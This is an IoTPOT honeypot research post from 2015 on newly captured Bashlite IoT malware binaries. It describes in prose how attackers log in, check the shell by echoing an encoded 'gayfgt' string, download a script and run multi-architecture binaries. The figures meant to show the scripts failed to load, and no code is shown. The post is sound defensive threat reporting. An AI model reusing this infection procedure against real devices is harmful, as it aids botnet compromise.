TOP > 研究成果 > IoTPOT > News

研究成果

IoTPOT captures new binaries of Bashlite family

[bin 55 to bin 67 of Table 1]
Created June 16, 2015


Bashlite Family  [ bin 55 to 62 of Table 1]

In June 4 and 8, 2015, IoTPOT captured new malware binary of “Bashlite” family designed to run on 7 different CPU architectures [X86, ARM, MIPS, MIPSEL, Power PC, SuperH, SPARC]. After successful login, attacker checks whether shell can be used or not by echoing '\x67\x61\x79\x66\x67\x74' which will be decoded into “gayfgt” in any type of shell and downloads a shell script named “bin4.sh”. Using downloaded shell script, attacker kills previously running malicious process and downloads malware binaries of 7 different CPU architectures and tries to run all binaries. Malware infection process is same as previously captured binaries of Bashlite family and, this time, only names of malware downloading script and downloaded binaries are changed. Within 2 days, IotPOT detected 2 times of such infection from 2 IP. By sandbox analysis, these new binaries are now scanning on port 23 [as of June 15,2015].


A read error occured.
Figure 1 - Downloaded binaries

Bashlite Family  [ bin 63 to 67 of Table 1]

In June 12, 2015, IoTPOT captured another new binary of “Bashlite” family designed to run on 5 different CPU architectures [ARM, MIPS, MIPSEL, Power PC, SuperH]. After successful login, attacker downloads a shell script named “binaries.sh” shown in Figure 2. Using downloaded shell script, attacker downloads malware binaries of 5 different CPU architectures as shown in Figure 3, and tries to run all binaries. Finally, attacker makes sure that current shell is BusyBoX by echoing '\147\141\171\146\147\164' which will be decoded into “gayfgt” only in BusyBOX shell. This time, malware infection processes are slightly different from previous Bashlite families although inside of binaries shares similar strings as previous ones. Within 3 days, IoTPOT detected 760 times of such infection from 8 IP. By sandbox analysis, these new binaries are now in PING/PONG stage with C&C [as of June 15,2015].


A read error occured.
Figure 2 - Inside of “binaries.sh” file

A read error occured.
Figure 3 - Sample of downloaded shell script

back